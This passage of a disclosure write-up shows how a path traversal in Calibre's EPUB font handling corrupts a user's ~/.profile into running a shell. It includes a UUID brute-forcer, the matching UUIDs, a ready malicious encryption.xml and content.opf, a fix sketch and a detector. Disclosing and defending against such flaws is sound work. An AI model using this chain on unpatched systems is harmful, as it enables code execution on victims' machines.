~/.profile and brute-forcing a UUID that produces specific XOR output, this file corruption can be weaponized into code execution. When the victim logs in or sources their profile, attacker-controlled commands execute.
Vulnerability Chain: LFI → Arbitrary File Corruption → Code Execution
Introduction
Calibre is one of the most popular ebook management applications, with millions of users worldwide. It handles various ebook formats, converts between them, and manages libraries. Given its widespread use and the fact that users regularly open ebooks from untrusted sources (online libraries, torrents, email attachments), any vulnerability in Calibre's file processing is worth investigating.
This writeup details a vulnerability I discovered in Calibre 9.1.0's EPUB processing that chains together several weaknesses to achieve code execution from a malicious ebook file.
The Discovery
While auditing Calibre's source code, I focused on the EPUB conversion pipeline. EPUBs are essentially ZIP archives containing XML metadata, XHTML content, and embedded resources like fonts and images. One interesting feature caught my attention: IDPF font obfuscation.
The IDPF (International Digital Publishing Forum) specification includes a method for "obfuscating" embedded fonts to prevent casual extraction. This isn't encryption—it's a simple XOR operation using the book's UUID as a key. Calibre implements this in src/calibre/ebooks/conversion/plugins/epub_input.py.
The vulnerability lies in how Calibre resolves the paths to these "encrypted" resources.
Technical Deep Dive
The Vulnerable Code
In epub_input.py, the process_encryption() function handles font decryption:
def process_encryption(self, encfile, opf, log):
    # ...
    for em in root.xpath('descendant::*[contains(name(), "EncryptionMethod")]'):
        cr = em.getparent().xpath('descendant::*[contains(name(), "CipherReference")]')[0]
        uri = cr.get('URI')  # Attacker-controlled from encryption.xml
        # LINE 75 - PATH TRAVERSAL
        path = os.path.abspath(os.path.join(os.path.dirname(encfile), '..', *uri.split('/')))
        if (tkey and os.path.exists(path)):
            decrypt_font(tkey, path, algorithm)  # LINE 79 - Corrupts the file
The critical issues:
- uri is extracted directly from META-INF/encryption.xml without any sanitization
- *uri.split('/') preserves .. path components
- os.path.abspath() resolves the traversal, escaping the EPUB's extraction directory
- decrypt_font() opens the resolved path in read-write mode and XORs its contents
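The effect of that join/abspath pattern can be reproduced in isolation. The sketch below mirrors the expression from the excerpt; the extraction directory /tmp/calibre_x and the helper name resolve_cipher_uri are hypothetical, chosen only for illustration, and posixpath stands in for os.path so the result is the same on every platform.

```python
import posixpath


def resolve_cipher_uri(encfile: str, uri: str) -> str:
    """Mirror the path construction from the excerpt (hypothetical helper name)."""
    return posixpath.abspath(
        posixpath.join(posixpath.dirname(encfile), '..', *uri.split('/'))
    )


# Hypothetical location of the extracted EPUB, for illustration only.
encfile = "/tmp/calibre_x/META-INF/encryption.xml"

benign = resolve_cipher_uri(encfile, "OEBPS/fonts/a.otf")
hostile = resolve_cipher_uri(encfile, "../../home/victim/.profile")

print(benign)   # stays under /tmp/calibre_x
print(hostile)  # lands outside the extraction directory
```

Nothing in the expression compares the result against the extraction directory, so the second call resolves to a path in the user's home directory.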
The IDPF Obfuscation Algorithm
The decrypt_font() function implements IDPF's font obfuscation:
- Compute SHA1(UUID), where UUID is taken from the book's content.opf
- Use the resulting 20-byte digest as the XOR key (a SHA1 digest is exactly 20 bytes long)
- XOR the first 1040 bytes of the target file with this key (repeating the 20-byte key)
def decrypt_font(tkey, path, algorithm):
    # tkey = SHA1(UUID)[:20]
    with open(path, 'r+b') as f:
        data = f.read(1040)
        # XOR operation
        decrypted = bytes([data[i] ^ tkey[i % 20] for i in range(len(data))])
        f.seek(0)
        f.write(decrypted)
This means an attacker can:
- Use path traversal to target any file writable by Calibre
- XOR its first 1040 bytes with a key derived from a UUID the attacker controls
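Because XOR is its own inverse, "decrypting" a file that was never obfuscated simply scrambles it. The following in-memory sketch shows this on a byte string rather than a real file. The helper xor_prefix and the all-zero UUID are placeholders, and hashing the full "urn:uuid:..." string is an assumption taken from the brute-forcer shown later in this writeup.

```python
import hashlib


def xor_prefix(data: bytes, key: bytes, span: int = 1040) -> bytes:
    """XOR the first `span` bytes of `data` with a repeating key; leave the rest alone."""
    head = bytes(b ^ key[i % len(key)] for i, b in enumerate(data[:span]))
    return head + data[span:]


# Placeholder identifier, not one of the UUIDs found by the brute-forcer.
key = hashlib.sha1(b"urn:uuid:00000000-0000-0000-0000-000000000000").digest()

# Stand-in for a plain-text file longer than 1040 bytes.
original = b"# ~/.profile: executed by the command interpreter for login shells.\n" * 20

corrupted = xor_prefix(original, key)
restored = xor_prefix(corrupted, key)

print(corrupted[:16])        # scrambled prefix
print(restored == original)  # a second pass undoes the first
```

Only the first 1040 bytes change; everything after that offset is left as it was.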
Exploitation: From Corruption to Code Execution
At first glance, XOR corruption seems like a limited primitive. The corruption is deterministic but depends on both the original file content and the UUID. How do we turn this into code execution?
The Key Insight
If we know the original content of a target file, we can calculate what XOR key we need to produce a desired output:
required_key = original_content XOR desired_output
Then we brute-force UUIDs until we find one whose SHA1(UUID) starts with our required key bytes.
Target Selection: Shell Initialization Scripts
On Linux/macOS systems, shell initialization scripts like ~/.profile, ~/.bashrc, and ~/.bash_profile are executed when a user logs in or starts a shell. These files commonly start with predictable content:
# ~/.profile: executed by the command interpreter for login shells.
As long as this stock header is intact, the first 4 bytes of the file are "# ~/" (hex: 23 20 7e 2f).
Crafting the Payload
I chose two payloads to demonstrate the vulnerability:
Payload 1: id;# - Executes the id command
- Target bytes: # ~/ → id;#
- Hex: 23 20 7e 2f → 69 64 3b 23
- Required XOR key: 4a 44 45 0c
Payload 2: sh;# - Spawns an interactive shell
- Target bytes: # ~/ → sh;#
- Hex: 23 20 7e 2f → 73 68 3b 23
- Required XOR key: 50 48 45 0c
The # at the end is crucial—it comments out the garbage bytes that follow (the rest of the XOR-corrupted line), preventing syntax errors.
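The key arithmetic for both payloads can be checked in a few lines of Python. This is only a verification sketch; xor_bytes is a helper name introduced here, not something from Calibre.

```python
def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR of two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("inputs must have the same length")
    return bytes(x ^ y for x, y in zip(a, b))


original = b"# ~/"  # known first four bytes of the target file

key_id = xor_bytes(original, b"id;#")
key_sh = xor_bytes(original, b"sh;#")

print(key_id.hex(" "))  # 4a 44 45 0c
print(key_sh.hex(" "))  # 50 48 45 0c

# Applying the key to the original bytes yields the payload.
print(xor_bytes(original, key_sh))  # b'sh;#'
```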
Brute-Forcing the UUID
I wrote a multi-threaded C brute-forcer to find UUIDs whose SHA1 hash starts with the required bytes:
// Target key bytes for sh;# payload
static const uint8_t TARGET_KEY[4] = {0x50, 0x48, 0x45, 0x0c};

void *worker(void *arg) {
    // ...
    while (!found && val < 0x100000000ULL) {
        snprintf(uuid_str, sizeof(uuid_str),
                 "urn:uuid:%08lx-0000-0000-0000-000000000000", val);
        // 45 = strlen("urn:uuid:") + 36 characters of UUID text
        sha1((uint8_t *)uuid_str, 45, sha1_result);
        if (sha1_result[0] == TARGET_KEY[0] &&
            sha1_result[1] == TARGET_KEY[1] &&
            sha1_result[2] == TARGET_KEY[2] &&
            sha1_result[3] == TARGET_KEY[3]) {
            found = 1;
            // Winner!
        }
        val += num_workers;  // each thread strides through its own slice of the counter space
    }
    return NULL;  // a void * thread function must return a value
}
On a 12-core CPU, finding a 4-byte match takes approximately 2-4 minutes.
Results:
[+] FOUND: urn:uuid:cf0909a3-0000-0000-0000-000000000000
    SHA1: 4a44450c... (for id;# payload)
[+] FOUND: urn:uuid:ef9a993a-0000-0000-0000-000000000000
    SHA1: 5048450c... (for sh;# payload)
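The same search can be sketched in single-threaded Python to make the logic easier to follow. It is far slower than the C version, so the example below matches only a two-byte prefix; find_uuid is a name introduced here, and the UUID layout simply copies the format string used above.

```python
import hashlib
from typing import Optional


def find_uuid(prefix: bytes, limit: int = 1 << 32) -> Optional[str]:
    """Return the first counter-based UUID whose SHA1 digest starts with `prefix`."""
    for val in range(limit):
        uuid = f"urn:uuid:{val:08x}-0000-0000-0000-000000000000"
        if hashlib.sha1(uuid.encode("ascii")).digest().startswith(prefix):
            return uuid
    return None


# Two-byte prefix only, so the search finishes quickly in pure Python.
hit = find_uuid(bytes.fromhex("5048"))
print(hit)
print(hashlib.sha1(hit.encode("ascii")).hexdigest())
```

Each extra prefix byte multiplies the expected work by 256, which is why the full four-byte search is better suited to a compiled, multi-threaded tool.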
Building the Malicious EPUB
An EPUB is a ZIP archive with a specific structure:
malicious.epub
├── mimetype               # Must be first, uncompressed
├── META-INF/
│   ├── container.xml      # Points to content.opf
│   └── encryption.xml     # Contains path traversal payload
└── OEBPS/
    ├── content.opf        # Contains our magic UUID
    └── ch.xhtml           # Minimal chapter content
The Path Traversal Payload (encryption.xml)
<?xml version="1.0" encoding="UTF-8"?>
<encryption xmlns="urn:oasis:names:tc:opendocument:xmlns:container"
            xmlns:enc="http://www.w3.org/2001/04/xmlenc#">
  <enc:EncryptedData>
    <enc:EncryptionMethod Algorithm="http://www.idpf.org/2008/embedding"/>
    <enc:CipherData>
      <enc:CipherReference URI="../../../../../../../../../../home/victim/.profile"/>
    </enc:CipherData>
  </enc:EncryptedData>
</encryption>
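From a defender's point of view, a file like this is easy to flag before conversion. The sketch below uses only the standard library to list CipherReference URIs that normalise to a location outside the archive root. The function name escaping_uris and the shortened sample document are illustrative, and the check does not decode percent-encoded URIs, so treat it as a starting point rather than a complete filter.

```python
import posixpath
import xml.etree.ElementTree as ET
from typing import List

ENC_NS = "{http://www.w3.org/2001/04/xmlenc#}"


def escaping_uris(encryption_xml: str) -> List[str]:
    """Return CipherReference URIs that point outside the archive root."""
    root = ET.fromstring(encryption_xml)
    flagged = []
    for ref in root.iter(ENC_NS + "CipherReference"):
        uri = ref.get("URI", "")
        norm = posixpath.normpath(uri)
        # Absolute paths and anything that still begins with ".." after
        # normalisation cannot refer to a file inside the EPUB.
        if uri.startswith("/") or norm == ".." or norm.startswith("../"):
            flagged.append(uri)
    return flagged


sample = """<encryption xmlns="urn:oasis:names:tc:opendocument:xmlns:container"
            xmlns:enc="http://www.w3.org/2001/04/xmlenc#">
  <enc:EncryptedData>
    <enc:EncryptionMethod Algorithm="http://www.idpf.org/2008/embedding"/>
    <enc:CipherData><enc:CipherReference URI="../../home/victim/.profile"/></enc:CipherData>
  </enc:EncryptedData>
  <enc:EncryptedData>
    <enc:EncryptionMethod Algorithm="http://www.idpf.org/2008/embedding"/>
    <enc:CipherData><enc:CipherReference URI="OEBPS/fonts/a.otf"/></enc:CipherData>
  </enc:EncryptedData>
</encryption>"""

flagged = escaping_uris(sample)
print(flagged)
```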
The Magic UUID (content.opf)
<?xml version="1.0" encoding="UTF-8"?>
<package xmlns="http://www.idpf.org/2007/opf" unique-identifier="uid" version="2.0">
  <metadata xmlns:dc="http://purl.org/dc/elements/1.1/">
    <dc:title>Innocent Book</dc:title>
    <dc:identifier id="uid">urn:uuid:ef9a993a-0000-0000-0000-000000000000</dc:identifier>
  </metadata>
  ...
</package>
The Attack in Action
Step 1: Victim Receives Malicious EPUB
The attacker distributes the malicious EPUB through any channel—email attachment, file sharing, ebook piracy sites, or even compromised legitimate sources.
Step 2: Victim Converts the EPUB
When the victim uses Calibre to convert the ebook (GUI: "Convert books" or CLI: ebook-convert):
$ ebook-convert malicious.epub output.mobi
Step 3: File Corruption Occurs
During conversion, Calibre parses encryption.xml, resolves the traversal path to /home/victim/.profile, and XORs the first 1040 bytes.
Before:
# ~/.profile: executed by the command interpreter for login shells.
After:
sh;#<garbage bytes>
Step 4: Code Execution on Next Login
When the corrupted ~/.profile is sourced, sh;# is interpreted as a command, spawning an interactive shell. The # comments out the garbage bytes.
Impact Analysis
Direct Impacts
- Code Execution: Arbitrary commands execute in the user's shell context
- Persistence: The corruption persists across reboots until manually fixed
- System Instability: Broken initialization scripts cause environment issues
Exploitation Constraints
- Target file must exist and be writable by Calibre
- Target file must have predictable first N bytes
- Brute-force time grows exponentially with payload length (256x per additional byte):
  - 4 bytes: ~2-4 minutes
  - 5 bytes: ~10-17 hours
  - 6+ bytes: months or longer at the same hash rate
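The scaling can be made explicit with a rough extrapolation. The sketch assumes a constant hash rate and scales linearly from the 2-4 minute figure reported for four bytes; the function names are introduced here for illustration. Note also that the eight-hex-digit counter used by the brute-forcer covers only 2^32 candidates, so prefixes longer than four bytes would need a wider search space.

```python
def expected_attempts(prefix_bytes: int) -> int:
    """Expected number of SHA1 evaluations to hit one fixed prefix."""
    return 256 ** prefix_bytes


def scaled_minutes(prefix_bytes, base_bytes=4, base_minutes=(2.0, 4.0)):
    """Scale the measured 4-byte timing by 256 per additional prefix byte."""
    factor = 256 ** (prefix_bytes - base_bytes)
    return tuple(m * factor for m in base_minutes)


for n in (4, 5, 6):
    low, high = scaled_minutes(n)
    print(f"{n} bytes: {expected_attempts(n):,} attempts, "
          f"~{low / 60:.1f} to {high / 60:.1f} hours")
```

Under these assumptions a five-byte prefix lands between roughly 8.5 and 17 hours, and a six-byte prefix between about 91 and 182 days on the same hardware.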
Platform Testing
| Platform | Interface | Status |
|---|---|---|
| Linux | CLI (ebook-convert) | Vulnerable |
| Windows | GUI (Convert books) | Vulnerable |
Root Cause Analysis
- Missing Input Validation: The URI attribute from encryption.xml is used directly without sanitization
- No Path Containment: Calibre doesn't verify that resolved paths remain within the EPUB extraction directory
- Unnecessary Write Access: The "decryption" operation opens files in read-write mode
- Trust in Untrusted Data: EPUB files from untrusted sources are processed with full privileges
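A containment check of the kind the second point calls for might look like the sketch below. This is not Calibre's actual patch; resolve_inside is a hypothetical helper that resolves the URI against the extraction directory and rejects anything that ends up outside it, including escapes via symlinks.

```python
import os
import tempfile


def resolve_inside(base_dir: str, uri: str) -> str:
    """Resolve `uri` under `base_dir`, raising ValueError if it escapes."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, *uri.split('/')))
    # commonpath equals base only when candidate is base itself or lies below it.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"URI escapes extraction directory: {uri!r}")
    return candidate


# Throwaway directory standing in for the EPUB extraction directory.
extract_dir = tempfile.mkdtemp()

print(resolve_inside(extract_dir, "OEBPS/fonts/a.otf"))

try:
    resolve_inside(extract_dir, "../../home/victim/.profile")
except ValueError as exc:
    print("rejected:", exc)
```

Comparing resolved paths with commonpath, rather than testing for ".." in the raw string, means the check still holds when the traversal is hidden behind redundant separators or symbolic links.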
Timeline
| Date | Event |
|---|---|
| 2025-02-01 | Vulnerability discovered |
| 2025-02-01 | Code execution escalation confirmed |
| 2026-02-06 | Vendor patch release |
| 2026-02-06 | Public disclosure |
Conclusion
This vulnerability demonstrates how a seemingly limited primitive (XOR file corruption) can be escalated to code execution through careful target selection and cryptographic brute-forcing. The attack requires user interaction (converting an ebook), but given Calibre's widespread use and the common practice of converting ebooks from untrusted sources, the real-world risk is significant.
The vulnerability affects both the GUI and CLI interfaces on Linux and Windows, making it a cross-platform threat. Users should update Calibre immediately.
Acknowledgments
Shoutout to Civiled for walking me through reversing the IDPF encryption algorithm. Figuring out how to weaponize the XOR corruption into controlled output felt like a real-life CTF challenge.